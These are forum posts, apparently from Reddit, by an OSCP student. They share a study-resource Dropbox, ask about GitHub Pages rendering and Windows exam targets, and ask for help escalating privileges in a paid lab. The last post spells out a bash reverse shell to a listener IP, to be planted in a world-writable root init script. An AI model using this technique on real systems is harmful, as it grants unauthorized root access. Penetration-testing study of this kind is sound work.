I am currently studying for OSCP and aiming to buy my lab time within the next month or two depending on funds, In the meantime I have been doing various VulnHubs, HTB etc etc and I have amassed quite a lot of resources inside my dropbox which is updated daily relating to various topics which are covered in the OSCP which I thought would be fairly useful to everyone else.
If you would like access PM me your email address & I will share with you :)
You can view a preview screenshot here > https://i.imgur.com/LQc5euV.png
PS: Please excuse my weird file names such as 'AMAZING AMAZING OSCP TOOL', It's just the way I name files for myself...
Edit: /u/Thisismy15thusername Requested a Read Only Link, Here we go >> https://www.dropbox.com/sh/ba0t59c5fnccgms/AACvUbUSflWB1_AAgj8okEUra?dl=0
Load more comments
Apologies if this is a noob question but I really am lost here - I have created the following Repo https://github.com/m0chan/m0chan.github.io and enabled GitPages and if I visit m0chan.github.io it appears as it should! Great! What's the problem?
Well I have created a folder called 'HackTheBox' where I will store reports of boxes I have completed in markdown format. I would like to be able to visit m0chan.github.io/HackTheBox/Valentine.md and it appears with the nice GitPage/Theme however it does not.... It is displaying in plain text?
I am currently prepping to take my OSCP hopefully by the end of 2018 and have a quick question, Throughout my preparation over the last few months I have noticed that most services/vulnhub boxes are linux and not windows (I understand due to licensing)
However I am wondering if I will be exposed to attacking Windows based systems within the OSCP? Specifically Windows 7,10 or Server 2008 / 2012?
If it is against the OSCP NDA to disclose this I will understand.
I am working on a lab through a subscription I have recently bought, hence I will try be vague to not disclose the lab/company etc.
Anyway I have exploited the box and got a limited shell, I have noticed a world writeable file that I think I should add my own reverse shell too however I have no idea how to add my code to it.
This is the file :-
-rwxrwxrwx 1 root root 6 Jun 26 15:05 /etc/init.d/james
Upon 'cat'ing' the file I receive the following putput :-
sudo JAVA_HOME=/usr/lib/jvm/default-java /opt/james-2.3.2/bin/run.sh
I am ideally looking to add something like bash -i >& /dev/tcp/172.16.4.2/8080 0>&1 into the 'james' file and reboot the server and gain a root shell?
How do I go doing this? I also hope I am on the right tracks...
Any help would be great...